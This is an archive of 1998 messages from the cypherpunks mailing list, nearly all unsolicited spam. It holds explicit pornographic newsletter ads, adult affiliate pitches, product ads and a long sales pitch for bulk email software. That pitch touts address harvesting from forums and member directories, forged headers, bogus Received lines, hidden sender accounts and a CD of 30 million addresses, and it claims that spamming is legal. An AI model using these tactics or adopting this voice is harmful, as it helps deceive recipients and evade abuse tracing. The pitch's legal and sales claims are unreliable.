Pic  2 --------------------------> http://137.39.63.229/?021
Pic  3 --------------------------> http://137.39.63.229/?022
Pic  4 --------------------------> http://137.39.63.229/?023
Pic  5 --------------------------> http://137.39.63.229/?024
Pic  6 --------------------------> http://137.39.63.229/?025
Pic  7 --------------------------> http://137.39.63.229/?026
Pic  8 --------------------------> http://137.39.63.229/?027
Pic  9 --------------------------> http://137.39.63.229/?028
Pic 10 --------------------------> http://137.39.63.229/?029

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cash_mr@hotmail.com
Date: Mon, 2 Feb 1998 07:26:21 -0800 (PST)
To: Friend@public.com
Subject: $25.00 for every FREE membership signup
Message-ID: <3.0.5.32.19971209114127.00a0983b0@alpha.net>
MIME-Version: 1.0
Content-Type: text/plain


This email is intended for Adult Webmasters only!  If you are not an Adult Webmaster 
and want to be removed from this and any responsible bulk emailers list.

Please visit Removelist.com's site for removal instructions at:

http://142.176.13.105
_____________________________________________________________


MR CASH will now guarantee $25.00 for every FREE membership signup!!! 

We have changed the program to pay you either the regular Mr Cash rate
(Up to $5.00 per raw hit) or  $25.00 per sale WHICH EVER IS HIGHER 
(By far the highest per sale rate in the industry) 

Your traffic is valuable.  Get paid for it every time.

The 100's of Webmasters that are already on the Mr Cash program are
Automatically switched to the new program retroactive to Jan.16 1998.

If you are not already on the Mr Cash program then here are some more
Reasons to sign up.

We Now 3 Great sites for you to advertise.  Advertise one or advertise
Them all.

You are able to offer the surfer a Free one-week trail membership
To 3 Great sites. Your conversion ratio will go through the roof.

Sponsors are paid BI-weekly, so they're no long waiting period to receive
your check.

We use the most dependable software available on the net today.

For more information or to sign up automatically

Signup for Pussy Paradise at-  http://mr-cash.com        
http://www.pussyparadise.com

Signup for Ultimate Hardcore at - http://mr-cash.com/ultimate   
http://www.ultimatehardcore.com

Signup for Erotic Paradise at  - http://mr-erotic--paradise.com/topcash 
http://www.erotic--paradise.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Feb 1998 18:40:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Continued Attack on Cash (Was: "The Right of
In-Reply-To: <v03102807b0fc184de4a7@[207.167.93.63]>
Message-ID: <qmXake21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May <tcmay@got.net> writes:

> At 3:52 PM -0800 2/2/98, Black Unicorn wrote:
> >At 06:07 PM 2/2/98 +0000, Attila T. Hun wrote:
>...
> >(I'm not on cpunks, mail me).
>
> Sorry, if you want to read my words ya gotta subscribe.

Let's collect Timmy's words of wisdom for posterity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Tue, 3 Feb 1998 06:28:47 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Tue Feb 3 '98
Message-ID: <19980203083236.13637.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Tuesday's issue of Eureka!

PINKBITS
Voted the  #1 Teen (18+) site  on the web,  this is  one pay
site you  don't want  to miss out on!  Here's just one quote
from a satisfied member:  "This site delivers awesome value.
I have been a member of 3 other sites,  and this is the best
by far. It has the best pics, more live video, younger girls
and more  hardcore cumshots  than the  other sites  put tog-
ether".  And we have negotiated a special FREE trial member-
ship for Eureka subscribers, so don't take our word, go see!
PinkBits .. http://207.33.10.198/cgi-bin/gate1/pbm/pb_0024/0

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Playgal - No.1 in Internet Hardcore!
http://www.playgal.com/playgal/banner_eureka.html
Playgal presents FREE LIVE FUCKING, and over 2,000 FREE XXX
MOVIES!

XXX 4 EVERY 1
Overall this site looks pretty good.  Click on the View Free
Sample Pics  to get to the good stuff.  Once over that fence
your in!  There  are thumbnails  of some hot  looking babes!
Wet  bush filled  with  hard dick.  Not a  bad  combination!
XXX 4 Every 1 .................... http://www.xxx4every1.com

DO ME LIVE
Do me too!  Do this, do that  and do the other.  If she lets
you!  This is  a paysite but  they have a  pretty juicy free
picture section. Girl on girl, shaved pussy, dildo, panties,
and clit  rubbing images.  Stroke your  browser over  there!
Do Me Live ........................ http://www.domelive.com/

CYBERJOY
Basic text links that deliver! Check out first time, that is
one  big black log,  and she  is enjoying it!  Cum shots and
links that will take you all over the place.  See the Hungry
for pussy picture. That tramp looks possessed!  Take a look.
Cyberjoy .......... http://www.cyberjoy.inter.net/adult3.htm

ADULT CHARTS
Here is  one to see.  Go there  right now. Tons of free pix!
Click on the free pictures area and your in.  Take your pick
of anal, cum shots, oral sex, girlgirl, teens, group action,
I could go  on more but you get the idea.  High quality jpeg
images  that load quickly!  These are some of  the best free
porno pix on the internet.  Grab your mouse and get surfing! 
Adult Charts .................... http://www.adultcharts.com

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
College teens -----> http://207.240.169.122/teens/start.html

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
Octavia: "Caught you looking" is the motto of this sweet 23-
year-old coed's web page. She loves  to show off, and claims
that she gets off thinking about all the horny guys checking
her out. Her photos exhibit her exhibitionist streak and are
of extremely high quality. Get  caught  looking at Octavia -
it's well worth sneaking a peak!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
T-Bone's Sex Club:  T-Bone  gives  you  a  new  selection of
erotic stories illustrated  with  nasty  hardcore pics! Last
week was Slut Wife week... what  will it be this week? Visit
T-Bone and find out! ............... http://www.rawsexx.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?030
Pic  2 --------------------------> http://137.39.63.229/?031
Pic  3 --------------------------> http://137.39.63.229/?032
Pic  4 --------------------------> http://137.39.63.229/?033
Pic  5 --------------------------> http://137.39.63.229/?034
Pic  6 --------------------------> http://137.39.63.229/?035
Pic  7 --------------------------> http://137.39.63.229/?036
Pic  8 --------------------------> http://137.39.63.229/?037
Pic  9 --------------------------> http://137.39.63.229/?038
Pic 10 --------------------------> http://137.39.63.229/?039

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pegasusgroup@emailconcepts.net
Date: Wed, 4 Feb 1998 17:50:56 -0800 (PST)
To: pegasusgroup@emailconcepts.net
Subject: Free Roger Clemens Lithograph
Message-ID: <199802031406.JAA25545@emailconcepts.net>
MIME-Version: 1.0
Content-Type: text/plain


Free Roger Clemen's Lithograph ($200 Value)
with purchase of  the Roger Clemens Collectors Ring

http://www.pegasusgroup.com/rogerclemens/roger.htm

Limited Edition Collectors Lithograph
Limited Edition Collectors Ring

In honor of  Roger's fourth Cy Young Award, Diamond Distributors
of America, Inc.  has commissioned Ray Vincent Delaney, to 
capture the essence of Roger in an original lithograph. 
Each lithograph has been signed by Roger and is numbered.

The  ring is designed and made by the Herff Jones Company,
designers and makers of the Heisman Trophy, Heisman Rings, 
Indy 500 Rings, NCAA Bowl Rings, NCAA Championship Rings 
and the Congressional Medal of Honor.
Each ring comes complete with Certificate of Authenticity
signed and numbered by Roger himself.
Only 1000 rings will be made.

http://www.pegasusgroup.com/rogerclemens/roger.htm
Within 2 weeks
Watch for:
               **** The new Roger Clemens Monthly Sweepstakes!!
         and 
              *****  The Collectors  Set of 12  Special Signature Series of
                           Roger Clemens Baseballs


///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@chemistry.ohio-state.edu>
Date: Tue, 3 Feb 1998 15:35:50 -0800 (PST)
To: <Cypherpunks@toad.com>
Subject: Returned mail: Host unknown (Name server: eureka.abc-web.co: host not found)
Message-ID: <199802032335.SAA06316@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 3 Feb 1998 18:35:44 -0500 (EST)
from ts14-8.homenet.ohio-state.edu [140.254.113.47]

   ----- The following addresses had permanent fatal errors -----
<eureka-unsubscribe@eureka.abc-web.co>

   ----- Transcript of session follows -----
550 <eureka-unsubscribe@eureka.abc-web.co>... Host unknown (Name server: eureka.abc-web.co: host not found)


Reporting-MTA: dns; chemistry.mps.ohio-state.edu
Received-From-MTA: DNS; ts14-8.homenet.ohio-state.edu
Arrival-Date: Tue, 3 Feb 1998 18:35:44 -0500 (EST)

Final-Recipient: RFC822; eureka-unsubscribe@eureka.abc-web.co
Action: failed
Status: 5.1.2
Remote-MTA: DNS; eureka.abc-web.co
Last-Attempt-Date: Tue, 3 Feb 1998 18:35:47 -0500 (EST)


To: eureka-unsubscribe@eureka.abc-web.co
Subject: Re: Eureka! Tue Feb 3 '98
From: Cypherpunks@toad.com
Date: Tue, 06 Jan 1998 01:54:08 -0800

Welcome to Tuesday's issue of Eureka!

PINKBITS
Voted the  #1 Teen (18+) site  on the web,  this is  one pay
site you  don't want  to miss out on!  Here's just one quote
from a satisfied member:  "This site delivers awesome value.
I have been a member of 3 other sites,  and this is the best
by far. It has the best pics, more live video, younger girls
and more  hardcore cumshots  than the  other sites  put tog-
ether".  And we have negotiated a special FREE trial member-
ship for Eureka subscribers, so don't take our word, go see!
PinkBits .. http://207.33.10.198/cgi-bin/gate1/pbm/pb_0024/0

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Playgal - No.1 in Internet Hardcore!
http://www.playgal.com/playgal/banner_eureka.html
Playgal presents FREE LIVE FUCKING, and over 2,000 FREE XXX
MOVIES!

XXX 4 EVERY 1
Overall this site looks pretty good.  Click on the View Free
Sample Pics  to get to the good stuff.  Once over that fence
your in!  There  are thumbnails  of some hot  looking babes!
Wet  bush filled  with  hard dick.  Not a  bad  combination!
XXX 4 Every 1 .................... http://www.xxx4every1.com

DO ME LIVE
Do me too!  Do this, do that  and do the other.  If she lets
you!  This is  a paysite but  they have a  pretty juicy free
picture section. Girl on girl, shaved pussy, dildo, panties,
and clit  rubbing images.  Stroke your  browser over  there!
Do Me Live ........................ http://www.domelive.com/

CYBERJOY
Basic text links that deliver! Check out first time, that is
one  big black log,  and she  is enjoying it!  Cum shots and
links that will take you all over the place.  See the Hungry
for pussy picture. That tramp looks possessed!  Take a look.
Cyberjoy .......... http://www.cyberjoy.inter.net/adult3.htm

ADULT CHARTS
Here is  one to see.  Go there  right now. Tons of free pix!
Click on the free pictures area and your in.  Take your pick
of anal, cum shots, oral sex, girlgirl, teens, group action,
I could go  on more but you get the idea.  High quality jpeg
images  that load quickly!  These are some of  the best free
porno pix on the internet.  Grab your mouse and get surfing! 
Adult Charts .................... http://www.adultcharts.com

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
College teens -----> http://207.240.169.122/teens/start.html

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
Octavia: "Caught you looking" is the motto of this sweet 23-
year-old coed's web page. She loves  to show off, and claims
that she gets off thinking about all the horny guys checking
her out. Her photos exhibit her exhibitionist streak and are
of extremely high quality. Get  caught  looking at Octavia -
it's well worth sneaking a peak!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
T-Bone's Sex Club:  T-Bone  gives  you  a  new  selection of
erotic stories illustrated  with  nasty  hardcore pics! Last
week was Slut Wife week... what  will it be this week? Visit
T-Bone and find out! ............... http://www.rawsexx.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?030
Pic  2 --------------------------> http://137.39.63.229/?031
Pic  3 --------------------------> http://137.39.63.229/?032
Pic  4 --------------------------> http://137.39.63.229/?033
Pic  5 --------------------------> http://137.39.63.229/?034
Pic  6 --------------------------> http://137.39.63.229/?035
Pic  7 --------------------------> http://137.39.63.229/?036
Pic  8 --------------------------> http://137.39.63.229/?037
Pic  9 --------------------------> http://137.39.63.229/?038
Pic 10 --------------------------> http://137.39.63.229/?039

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 71440094@ix.netcom.com
Date: Tue, 3 Feb 1998 19:21:57 -0800 (PST)
To: JuDa1635@ix.netcom.com
Subject: Better Choice for Airport Transportation
Message-ID: <K896Y49058.STTP886772@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


GERMANY - Airport Shuttle Services - the Better Choice for Airport Transportation
to and from 18 German Airports

24 hours per day, 365 days per year
Door to door service to and from your residence, business or hotel.

Complete online Reservations at    http://www.airport-shuttle.com

Using our services can greatly reduce your companys ground transportation
expenses.
You will see your exact costs on reservation form - no hidden surprises
Comfortable, clean, air conditioned passenger cars .  
Courteous, safe drivers. Exclusive transfer - no additional pick up
Reliable, Convenient , Cost Effective, Punctual
We also provide transportation for all situations, occasion and/or events
Join us now  http://www.airport-shuttle.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tulii@ak.planet.gen.nz
Date: Wed, 4 Feb 1998 08:03:01 -0800 (PST)
To: tulii@ak.planet.gen.nz
Subject: BULK  EMAIL  FOR  PROFIT
Message-ID: <19980203997SAA14722@post.com.au>
MIME-Version: 1.0
Content-Type: text/plain



******************************************************
        
        MAIL THOUSANDS OF EMAIL MESSAGES
                  PER HOUR - NO KIDDING !! 
               

          SEND YOUR EMAIL MESSAGES OUT, AT
         1,000's MESSAGES / HOUR (28.8K modem)

           YES, 1,000's  Of Messages An Hour

******************************************************

	 30  MILLION  EMAIL  ADDRESSES

                        ******** $100.00 *******

******************************************************

  YOU'LL RECEIVE 2 HIGH-SPEED EMAIL SOFTWARE PROGRAMS

Introducing...."FLOODGATE BULK EMAIL LOADER" 
        AND...."GOLDRUSH STEALTH MASS MAILER"

This is the same software that all bulk emailing services use!

----------------------------------------------------

Floodgate Bulk Email Loader Version 6.0 AND
Goldrush Stealth Mass Mailer Version 3.215
for Windows 95 and Windows 3.1 now Supports 17 
(really more with the free form filter) File Formats

----------------------------------------------------


SEND OUT 20,000+ MARKETING LETTERS EVERY SINGLE DAY!

Or...every few days. In fact, when I send out just a few thousand marketing letters each day, it doesn't take long before I'm completely swamped with email inquiries and phone calls. This is very easy to do. And each one of these bulk mailings costs me nothing. I can teach you how to do this and provide you with the tools you'll need.

If you've got a good marketing letter, I'll show you how to open the floodgates. You'll be deluged with inquiries, leads, and real sales, using nothing but email alone.

Writing a good marketing letter is not easy. I often have to rewrite my marketing letters a half dozen times before I get the results I'm looking for. But once you have a good letter, as you probably know, you can use the same letter over and over again, predictably and consistently, closing sales, week after week, month after month.

It takes me about one hour to send my marketing letter to THOUSANDS of fresh email addresses. I can do this, thanks to a Windows program I use. It's called Floodgate and Goldrush Stealth Mass Mailer. It's a bulk email loader and an email software program. If you're interested in electronic marketing, you should know about these programs.

PROGRAM #1: FLOODGATE FOR WINDOWS

The Floodgate Bulk Email Loader imports simple text files that anyone can download from CompuServe, Prodigy, Delphi Genie, or the Internet. These text files contain classified ads, forum messages, or data from the member directory. Each of these files is filled with email addresses.

Floodgate is designed to read these files and strip out the email addresses. It then sorts the addresses, removes any duplicates, and formats them into an output file, with 10, 20 or 30 addresses per line. This is all done in one simple step. Just point and click.

You'll need either a Windows based Internet account or an America On-line account to send out your marketing letters. Neither AOL nor the Internet charges to send email. Send your letter to 1,000 people or 10,000 people -- the cost is always the same. NOTHING!

NEW! PREPARE A MAILING OF 50,000+ 
IN LESS THAN A 1/2 HOUR

If you open an Internet account, you can send each letter to 20,000+ people. The new Floodgate now directly writes distribution lists. Some people are always collecting new addresses, but if you publish a newsletter or adsheet, you'll be using the same addresses over and over again. That's real power! When using addresses you've previously collected, you can press a few buttons and prepare a mailing of 50,000+ in less than a half hour.

(To get a list of all the Internet access providers in your local calling area goto: http://thelist.com and click on your area code.)

The Floodgate Users Guide will teach you, step by step, how to download the right files, how to strip the addresses, and finally, how to cut and paste the formatted addresses into your marketing letter. Or, if you have an Internet account, how to create distribution lists. One you've done this a few times you won't even have to think. It's that simple!

FOR THE BRAVE & DARING: PUSHING TECHNOLOGY TO ITS LIMITS

As you may know, the practice of sending unsolicited email is usually frowned upon, and most service providers have rules against it. But, like jay-walking, there is little enforcement. It's not illegal. If someone tells you that it is, ask them to provide the citation (and don't let them give you some nonsense about faxes - that's not email). They can't do it because it's not there. Sometimes, when a lot of people complain, I get a warning letter. And that's about it.

About 1 in 200 will write back and tell me, "take me off the list", which I can do, thanks to Floodgates Remove List feature. Many people reply back thanking me for sending them my informative letter. That's always nice. Most people though, just reply and say, "send me more info." In this way, it usually takes me two or three letters to close a sale.

The Floodgate Users Guide will provide you with proven formats for writing a successful marketing letter. You'll test and rewrite, test and rewrite. Then, once you've got it, just push a few buttons, and open the floodgates!!!

THE FLOODGATE BULK EMAIL LOADER CURRENTLY SUPPORTS 17+ FILE FORMATS

1. CompuServe Classifieds: Send your marketing letter to everyone who is running a classified ad. I'll teach you how to download all the classifieds from any single ad category. This is one of the most responsive list of buyers. They check their email every day and they're already in business.

2. America On-line Classifieds: Download 1,000 addresses in 15 minutes. These are excellent lists for business to business sales.

3. CompuServe Forums: You can join a forum and download hundreds of forum messages in a matter of minutes.

4. America On-line Forums: Choose from dozens of forums. All good targeted lists.

5. Prodigy Forums: Prodigy allows you to easily export any group of forum messages. More targeted lists.

6. Internet Newsgroups: These are all targeted lists. You'll be able to send your marketing letter to everyone who posts a message in any newsgroup. Easily collect 1,000's of addresses per hour.

7. America On-line Member Directory: Most member directories only allow you to search by city and state. With AOL, you can search by business type, hobbies, computer type, etc. This is the gem of all
member directories. Build huge targeted lists.

8. CompuServe Member Directory: This is a major resource. If you're willing to target your mailing to a single city, you can collect about 1,000 email addresses an hour.

9. Delphi Member Directory: The Delphi member directory allows you to search for people based on key words. These are good targeted mailing lists. A single search can easily generate 5,000 addresses.

10. Genie Member Directory: Similar to the CompuServe member directory, only you can download names much quicker. You can easily pull hundreds of thousands of addresses out of each of these member directories.

11. CompuServe File Cabinet: If you run classified ads, and save the responses in the CIM file cabinet, you'll be able to easily reuse these addresses. You can send your marketing letter to everyone in any single folder. Build master lists and clean UP your hard drive.

12. Free Form: If you have a text file with email addresses that floodgate does not support, chances are the Free Form filter will be just what you need. Just enter a key word to search for.

13. CompuServe Form Profiles (Forum Membership Directories): Easy to build targeted lists here. Each search can easily bring you 500+
addresses.

14. Genie Profiles: If you're building targeted lists, you'll get a lot of addresses very quickly from Genie.

15. Plain Addresses: Read Floodgate Master Files back into Floodgate to merge files and do selective mailings. Also useful for the management of email address lists that you might purchase.

Floodgate also has filters to allow you to include or exclude any groups of addresses in your final distribution lists. For example, you could include only email addresses that ended in .com or exclude all with .gov. You could exclude all noc, root, and other addresses that almost guarantee a negative response. These filters are fully configurable and can be used together.

BUILD REUSABLE MASTER FILES

Floodgate maintains Master Files for each of your marketing letters. If you download from the same place on a regular basis, you only want to send your letter to the new people. Floodgate will compare the new addresses with those in the Master File, and prepare a mailing list of only new people. The new addresses are, of course, then added to the Master File. With each new mailing your Master File grows and grows.

You may create as many Master Lists as you need. When you start a new marketing campaign, you'll want to send your new letter to everyone on your Master List. If you write a newsletter, each time you send your newsletter, you'll send it to everyone on a Master List.

THE REMOVE LIST

Very often, people will reply and tell you to take them off your mailing list. Place these addresses in the REMOVE.MST file and they will never receive another letter from you again. In this way, you will be operating your business with the most professionalism
possible.

DON'T BE FOOLED

We have some new competitors that have tried to copy Floodgate. The following list describes why Floodgate is BETTER.......

**Floodgate is a mature, bug free product. Not an initial release.
**Floodgate comes with over 100 pages of step by step       documentation.
**Floodgate is the only one offering a money back guarantee.
**Floodgate has more testimonials. 
**Filter for filter, Floodgate offers more capabilities, way more. 
**Floodgate does everything all the others *combined* claim. 
**Floodgate is by far the easiest to use.
**There is NO *cutting and pasting* with Floodgate. 
**We have by far, the BEST technical support.

SOME QUICK MATH

Floodgate can pay for itself in a few days. It can also cut your advertising costs down to almost nothing. Think of what the competition will do when they get their Floodgate program. Don't be left in the dust - there are 75 million people out there, just a few keystrokes away. Let's do the math:

- Email 50,000 sales letters (takes about 1-2 hours)
- Let's say your product will bring you $5 profit per   sale.
- Let's also say you only get a 1% response(occasionally higher).

* That's 500 orders x $5 = $2,500 profit !! Now imagine what 500,000 letters would do for your business !!

WHAT CAN I MARKET ON-LINE?

You can market anything on-line using direct email, that can be marketed using conventional postal direct mail marketing. The possibilities are practically endless. If it sells off-line, you can sell it on-line.

EASY TO INSTALL AND EASY TO LEARN

The Floodgate Email Loader requires Windows. The SUPPLIED MANUAL tells you where to go, what to do, and how to do it. All you need are basic computer skills that can be learned with a little practice or help from our computer savvy technicians.

PROGRAM #2: GOLDRUSH STEALTH MASS MAILER

Do not get this program confused with other slow speed programs that call themselves "STEALTH". This program is the only one in the world that can send email out at HIGH SPEEDS with one single connection to the internet. 

This is NEW, Cutting Edge Email Technology. First Of It's Kind.. The Most Powerful BULK EMAIL SENDER In The World.. NOTHING CAN EVEN COME CLOSE! 

Thanks to our top programmer's, this technology is NOW available and we are the only place you can get it from! 

     *ONLY "ONE" DIAL-UP OR ISDN CONNECTION NEEDED. 
     *NO MORE TERMINATED CONNECTIONS. 
     *NO MORE WAITING TO SEND LARGE AMOUNTS OF EMAIL. 
     *IMMEDIATE RESPONSE TO YOUR MASS MAILINGS. 
     *YOU WILL HAVE ALL THE CONTROL AND CONFIDENCE OF 
       SENDING EMAIL THE WAY IT SHOULD BE SENT... IN HUGE AMOUNTS! 
     *SEND YOUR WHOLE LIST IN ONE DAY, WHETHER IT BE 500,000 
       OR 5 MILLION - AND JUST SIT BACK AND WAIT FOR YOUR 
       ORDERS TO POUR IN. 
     *NO MORE DOWNLOADING UNDELIVERABLE NAMES.

Bulk Emailer's Dream Come True!!! - >>>GOLDRUSH STEALTH MASS MAILER<<< 

Connect to multiple mail servers (20 or more), make multiple connections to a single server or any combination of the two ( All Simultaneously ) with one single dial-up connection. 

SEND MULTIPLE SIMULTANEOUS MAILINGS... 

View complete details about your mailings. Shows each server your connected to, the status of that connection, how many messages are going out through that connection, etc...

We show you ALL the tricks all the mass e-mailers don't want you to know... 

Here are just a few features the GOLDRUSH STEALTH MASS MAILER offers to you... 

     *Forge the Header - Message ID - ISP's will Spin their wheels. 
     *Add's a Bogus Authenticated Sender to the Header. 
     *Add's a complete bogus Received From / Received By line with 
      real time / date stamp and recipient to the Header. 
     *Does NOT require a valid POP Account be entered in order to 
      send your mailings. 
     *Easy to use and operate 
     *Plus much more! 

All this, at speeds of up to 1,000's messages/hour
(28.8k modem). 

SPECIAL INTRODUCTORY PRICE... 

NOW YOU CAN HAVE BOTH THE FLOODGATE AND 
GOLDRUSH STEALTH MASS MAILER FOR JUST $499.00! 

UPDATE ... SAVE $149.05 AND ORDER NOW, BE ONE OF THE FIRST 100 ORDERS! 

Step up to the plate and play with the big boys TODAY and receive the COMPLETE 2 SOFTWARE PACKAGE for the unbelievably low price of ONLY $349.95! 

(Other bulk email software has sold for as much as $2,500 and can't even come close to the cutting edge technology of EASE, ACCURACY AND SPEED ... SPEED ... SPEED!) 

Try the Goldrush Stealth Mass Mailer & Floodgate Bulk Email Loader for 10 days FREE. 
And receive UNLIMITED technical support for 30 days.

**************************************************************

	            30 MILLION EMAIL ADDRESSES
	MILLIONS AND MILLIONS OF EMAIL ADDRESSES

CD with MILLIONS of email addresses separated by domain name.
All addresses are simple text format one per line. Addresses
from the following domains: Pipleline, MSN, MCI, Juno, Delphi,
Genie, AOL, Compuserve, Internet, .com & .net, MILLIONS OF THEM!
Not available on diskette or download.

===> WANT THE MILLIONS OF ADDRESSES FOR $100.00? <===

Just buy our Floodgate / Goldrush software package (with ALL
the bonuses INCLUDED), and the MILLIONS of addresses are yours
for just $100.00 additional.

These addresses will be delivered to you in simple text files
that any bulk emailing program can use, on CD Rom. With this CD,
YOU CAN BEGIN MAKING MONEY IMMEDIATELY!!!

***************************************************************

***SPECIAL BONUS #1:*** STOP Losing ISP Dial Up Accounts! 

If you order The FLOODGATE / GOLDRUSH software within the next 5 days - When you receive your program, you will also receive: 

*Complete instructions on "how to keep your dial up account from  showing up in the header", plus everything you will need to get started doing this. 

IMPORTANT NOTICE! We will initially only be offering 100 copies of the program for sale, First come / First Served basis only. We are doing this because of the extreme power that these programs offer.


***SPECIAL BONUS #2*** 

When you receive your two programs, you will also receive:
OVER 250 REPRINT AND RESELL RIGHTS REPORTS YOU CAN START TO MARKET
AND MAKE MONEY IMMEDIATELY!!! 

     These HOT sellers include: 
     1) How to Get a Top Rating in the Search Engines 
     2) 70 Money Making Reports 
     3) 75 MONEY MAKING PLANS & TRADE SECRETS and MUCH MUCH MORE!!!  
         ($200 RETAIL VALUE - FREE!!!) 


***SPECIAL BONUS #3***

With your two software programs, you will also receive our NEW "Address Grabber" utility program that enables you to grab 100's of THOUSANDS of email addresses from
newsgroups in minutes ($100 RETAIL VALUE - FREE).


***SPECIAL BONUS #4***

RECEIVE CHECKS BY EMAIL, PHONE OR FAX MACHINE. With this software
program, you can receive payment for your product or service INSTANTLY!!
There is no more waiting for your customers check to arrive. This
software will no doubt, add to your sales, for customers who
don't have credit cards, as well as the impulse buyers.

With this software, you can print up your payments as soon as your
customer gives you his/her checking information. You will then
add the information given, to the proper blank check spaces, then
just print and go to the bank!!

         ***************************************************

To get your FREE demo and "test drive" our state-of-the-art software, 
fax us your email address and request to:
			
		1-561-966-6839

         ****************************************************

              HURRY ... RESERVE YOURS TODAY! 

So, if you are interested in taking advantage of the most powerful bulk 
email software in the world and start making money hand over fist.....

Print out the EZ ORDER form below and FAX or MAIL it to our office.

If you have any questions don't hesitate to call us at: 1-561-965-6139

SYSTEM REQUIREMENTS

386 or larger
